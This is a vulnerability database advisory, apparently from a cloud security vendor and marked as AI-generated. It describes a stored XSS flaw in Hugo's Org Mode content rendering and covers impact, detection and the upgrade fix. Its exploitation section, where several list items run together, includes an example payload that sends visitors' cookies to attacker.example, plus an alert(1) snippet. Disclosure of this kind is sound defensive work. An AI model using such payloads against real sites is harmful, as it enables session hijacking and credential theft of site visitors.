
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-100694 is a stored Cross-Site Scripting (XSS) vulnerability in Hugo, a popular open-source static site generator. Affecting versions v0.56.0 through v0.165.x, the flaw allows attackers who can supply or influence content files mapped to the text/org media type to inject arbitrary HTML and scripts into generated pages. The vulnerability was published on September 26, 2026, with a fix released in v0.166.0. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Hugo Security Advisory).
The root cause is improper neutralization of input during web page generation (CWE-79). Hugo's rendering pipeline for the text/org media type (Org Mode content) passes raw HTML through without escaping: specifically, Org export blocks (e.g., #+BEGIN_EXPORT html ... #+END_EXPORT) and inline @@html:...@@ snippets are rendered verbatim into the generated HTML output. An attacker who can write to or influence any content file under /content, or control the output of a content adapter that produces text/org-typed content, can embed malicious <script> tags or event handlers that execute in site visitors' browsers. The attack vector is network-based, requires no privileges, and only requires user interaction in the form of a visitor loading the affected page (GitHub Advisory, Hugo Security Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of visitors to affected Hugo-generated pages, enabling session hijacking, credential theft, phishing, or defacement of the site's content as rendered in the browser. The impact is limited to the subsequent (browser) system — confidentiality and integrity of visitor sessions are at risk, while the Hugo server itself is not directly compromised. Only pages sourced from text/org content files or content adapters producing that media type are affected; sites that fully trust all content contributors are not impacted (GitHub Advisory, Hugo Security Advisory).
As of the disclosure date, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The EPSS score is 0.0, indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires the ability to supply or modify text/org content files or content adapter output, which limits the attack surface to scenarios involving untrusted content contributors or compromised content pipelines.
.org) content files./content directory (e.g., via a CMS, pull request, or compromised content adapter) that will be mapped to the text/org media type.#+BEGIN_EXPORT html
<script>document.location='https://attacker.example/steal?c='+document.cookie</script>
#+END_EXPORTor using the inline form: @@html:<script>alert(1)</script>@@#+BEGIN_EXPORT html blocks or @@html:...@@ snippets containing <script> tags, event handlers (e.g., onerror, onload), or external URL references in .org content files under the /content directory.<script> tags or inline JavaScript in Hugo-generated HTML pages corresponding to Org Mode source files; inspect built HTML for unexpected script inclusions..org content files in version control history (e.g., git log showing additions of HTML export blocks); CI/CD build logs showing new or modified Org Mode files introduced by unfamiliar contributors.Upgrade Hugo to v0.166.0 or later, which introduces a security.allowContent allowlist that denies text/org content by default, preventing unescaped HTML rendering. Sites that intentionally use Org Mode content can opt back in by adding [security] allowContent = ['.*'] to their Hugo configuration after carefully auditing all content sources. As an interim workaround for sites that cannot upgrade immediately, restrict write access to content files and content adapters to fully trusted contributors only, and avoid ingesting Org Mode content from untrusted or external sources (Hugo Security Advisory, GitHub Advisory).
The vulnerability was credited to researcher philipdissert as the finder, as noted in the Hugo security advisory. The Hugo maintainer (bep) published the advisory on September 9, 2026, with the CVE formally assigned and published on September 26, 2026. No significant broader media coverage or notable social media discussion has been identified at this time (Hugo Security Advisory).
Fix availability across major Linux distributions and their releases.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."